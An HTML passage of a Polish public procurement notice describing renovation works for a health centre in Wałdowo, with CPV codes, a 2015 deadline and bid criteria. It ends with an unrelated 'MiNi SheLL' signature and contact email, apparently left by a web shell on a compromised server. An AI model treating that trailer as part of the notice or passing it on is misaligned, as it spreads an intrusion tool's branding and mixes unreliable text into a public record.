<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.23.32.00-1, 45.33.00.00-9, 45.31.12.00-2, 45.43.21.00-5, 45.44.21.00-8, 45.42.11.31-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na wykonane roboty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - Ośrodek Zdrowia w Wałdowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rodzaj i zakres  planowanych robót
1.1 roboty murowe:
- uzupełnienie ścianek i zamurowanie otworów w ścianie z bloczków betonu komórkowego 
- rozbiórka ścian działowych i wykonanie nowych ścian działowych z bloczków betonu komórkowego o grubości 12 cm;
- ułożenie nadproży prefabrykowanych; 
- wykonanie  wentylacji i osadzenie kratek wentylacyjnych w ścianach;
- wywiezienie gruzu;
W.w roboty należy wykonać zgodnie z dokumentacja projektową branży architektonicznej.
1.2.tynki i okładziny wewnętrzne:
- uzupełnienie tynków wewnętrznych z zaprawy cementowo wapiennej na ścianach i stropach;
- wykonanie gładzi jednowarstwowej o grubości 3 mm z gipsu szpachlowego na podłożu z tynku;
- zasłonięcie otworów okiennych płytami kartonowo - gipsowymi na ruszcie metalowym (pom. nr 4 i nr 6 - Rys. nr 1  inwentaryzacja);
- malowanie powierzchni ścian i sufitów (pom. 5; 6; 7; 8; 9 rys. rzut parteru);
- licowanie ścian płytkami na zaprawie klejowej (w pom. 5; 8; 9);
W.w roboty należy wykonać zgodnie z dokumentacja projektowa branży architektonicznej.
1.3.roboty posadzkowe
- wykonanie podłogi wraz z rozbiórką wg rys. nr 4 przekrój A-A (branża budowlana)
1.4.stolarka okienna i drzwiowa
- wstawienie drzwi z ościeżnicami 70 - 1 szt.
- wstawienie drzwi z ościeżnicami 90 - 3 szt.
- wstawienie drzwi z ościeżnicami 100- 1 szt.
W.w roboty należy wykonać zgodnie z dokumentacja projektowa branży architektonicznej.
1.5.	roboty elektryczne 
- budowa wewnętrznej linii zasilającej, instalacji oświetlenia, instalacji gniazd wtykowych wraz montażem tablicy TG/TL w pomieszczeniach objętych przedmiotem zamówieniem (rys. nr  1; nr 2; nr 3; nr;4; nr 5 - branża elektryczna)
- montaż systemu alarmowego w toalecie dla osób niepełnosprawnych;
1.6.	roboty instalacyjne 
- wykonanie podejść wodno - kanalizacyjnych, montaż armatury łazienkowej wraz z montażem uchwytów dla niepełnosprawnych - (2 umywalki, 1 zlewozmywaki, 2 miski ustępowe, pisuar) 
w pomieszczeniach objętych przedmiotem zamówieniem (rys. nr  1; nr 2; nr 3 branża sanitarna);
- montaż  instalacji c.o. wraz z grzejnikami w pomieszczeniach objętych przedmiotem zamówieniem (rys. nr  4 branża sanitarna);.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.11.11.00-9, 45.23.32.00-1, 45.26.25.20-2, 45.33.11.00-7, 45.33.00.00-9, 45.31.12.00-2, 45.41.00.00-4, 45.43.21.00-5, 45.44.21.00-8, 45.42.11.31-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na wykonane roboty - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com